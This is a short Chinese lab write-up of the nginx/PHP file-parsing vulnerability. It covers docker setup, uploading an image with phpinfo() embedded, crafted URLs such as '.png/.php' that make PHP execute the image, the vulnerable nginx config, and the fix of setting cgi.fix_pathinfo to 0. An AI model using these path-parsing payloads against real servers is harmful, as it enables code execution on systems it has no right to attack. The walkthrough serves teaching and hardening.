nginx文件解析漏洞实验
1、布置实验环境
cd nginx_parsing_vulnerability/
docker-compose up -d
systemctl stop firewalld
iptables -F
找个图片,写个phpinfo()到里面
上传
告诉你存储路径
访问图片
http://192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php
http://192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/%20/0.php
192.168.39.133/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/00%/0.php
漏洞解析
当cgi.fix_pathinfo=1的情况,这种情况服务器就比较智能了,服务器会自动判断哪个是真正的文件,把真正的文件交给php-cgi来解析。同时把文件的后面的数据保存在环境变量$_SERVER['PATH_INFO']中。
nginx的配置文件
server {
listen 80 default_server;
listen [::]:80 default_server;
root /usr/share/nginx/html;
index index.html index.php;
server_name _;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
fastcgi_param DOCUMENT_ROOT /var/www/html;
fastcgi_pass php:9000;
}
将# php.ini
中的cgi.fix_pathinfo=1改为0(在不影响业务的情况下)
移除环境
docker-compose down